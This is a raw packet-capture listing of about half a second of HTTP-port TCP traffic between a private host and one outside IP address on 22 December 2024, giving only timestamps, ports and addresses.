Dec 22, 2024 02:16:30.596189022 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.597153902 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.597199917 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.597208023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.597254038 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.598247051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.598298073 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.598341942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.598387957 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.599374056 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.599426985 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.599498034 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.599548101 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.600439072 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.600483894 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.749347925 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.749399900 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.749403954 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.749444008 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.803349972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.803409100 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.803411007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.803455114 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.866067886 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.866131067 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.869085073 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.869136095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.869138956 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.869184017 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.923307896 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.924124002 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.986005068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986057043 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986093998 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986129999 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986140013 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.986167908 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986181021 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.986207962 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986212969 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.986318111 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986355066 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986366987 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.986413002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986449003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986459017 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.986485004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.986490011 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.986696959 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987210035 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987262011 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987277985 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987302065 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987308025 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987375021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987406015 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987411976 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987421989 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987451077 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987456083 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987494946 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987842083 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987876892 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987912893 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987948895 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.987972021 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.987987041 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.988015890 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.988027096 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.988606930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.988662958 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.988662958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.988702059 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.988712072 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.988738060 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.988740921 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.988773108 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.988780975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.988810062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.988852978 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.989552021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.989586115 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.989609957 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.989623070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.989626884 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.989670992 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.989676952 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.989706993 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.989751101 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.990370035 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.990421057 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.990422010 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.990456104 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.990466118 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.990493059 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.990526915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.990537882 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.990561962 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.990572929 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.990634918 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.991216898 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.991266012 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.991272926 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.991309881 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.991341114 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.991364956 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.991370916 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.991400957 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.991413116 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.991437912 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.991446018 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.991473913 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.992098093 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.992132902 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.992167950 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.992196083 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.992208004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.992213011 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.992244959 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.992288113 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.992958069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993000031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993036032 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993046045 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.993072033 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993079901 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.993108034 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993144035 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993151903 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.993833065 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993869066 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993880987 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.993906021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993916035 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.993942022 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993976116 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.993988037 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.994669914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.994705915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.994718075 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.994744062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.994744062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.994784117 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.994817972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.994836092 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.994853973 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.994858980 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.995223045 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.995464087 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.995518923 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.995534897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.995557070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.995565891 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.995594025 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.995629072 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.995635033 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.995743990 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.996385098 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.996421099 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.996437073 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.996455908 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.996465921 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.996493101 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.996495008 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.996527910 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.996531010 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.996562958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.996567965 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.996603012 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.997241020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.997277975 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.997312069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.997334003 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.997348070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.997373104 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.997383118 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.997396946 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.997425079 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.998037100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.998089075 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.998095036 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.998123884 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.998127937 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.998161077 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.998168945 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.998197079 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.998231888 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.998248100 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.998296976 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.998960972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.998996973 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999020100 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.999032974 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.999049902 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999087095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999120951 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999130964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.999156952 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999260902 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.999866962 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999902964 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999938011 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.999948978 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.999974966 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000024080 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.000641108 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000655890 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000689983 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000698090 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.000714064 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.000726938 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000730991 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.000761986 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000768900 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.000797987 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000803947 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.000845909 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.000852108 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.000897884 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.001532078 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.001569033 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.001581907 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.001605988 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.001612902 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.001641989 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.001651049 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.001677990 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.001679897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.002408028 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.002444029 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.002454996 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.002480984 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.002516985 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.002526045 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.002552032 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.002561092 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.002589941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.002633095 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.003226042 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.003262043 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.003297091 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.003309011 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.003334999 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.003350019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.003386021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.003427029 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.004026890 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.004080057 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.004112959 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.004127026 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.004152060 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.004157066 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.004185915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.004220963 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.004228115 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.004407883 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.004950047 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.004986048 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005021095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005032063 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.005058050 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005064011 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.005093098 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005126953 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.005795002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005831003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005866051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005880117 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.005902052 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.005909920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.005991936 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006030083 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006036997 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.006628036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006664038 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006678104 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.006700039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006705999 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.006736040 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006771088 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006778955 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.006805897 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.006844044 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.007509947 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.007548094 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.007560015 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.007581949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.007584095 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.007617950 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.007626057 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.007653952 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.007662058 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.007761955 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.008368015 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.008404970 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.008440018 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.008457899 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.008476019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.008486032 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.008511066 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.008547068 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.008563042 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.008965969 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.009216070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.009253025 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.009289026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.009310961 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.009325027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.009335041 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.009360075 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.009362936 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.009403944 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.010113001 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010149002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010175943 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.010185003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010191917 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.010220051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010221958 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.010253906 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.010253906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010288954 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010339975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.010925055 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010962009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.010971069 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.010998011 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011003971 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.011034966 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011058092 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.011070967 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011080980 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.011131048 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.011719942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011776924 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011811972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011820078 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.011848927 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011883020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.011893034 CET	49804	80	192.168.2.4	31.41.244.11
